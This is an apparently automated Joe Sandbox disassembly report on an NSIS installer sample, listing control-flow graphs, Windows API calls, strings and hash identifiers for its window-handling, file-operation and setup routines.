                                                                                                                                                                                                                                                                                                                                      control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID: @rD
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                                                      • API String ID: 608394941-1650083594
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,ManufactureJazz,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,ManufactureJazz,ManufactureJazz,00000000,00000000,ManufactureJazz,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
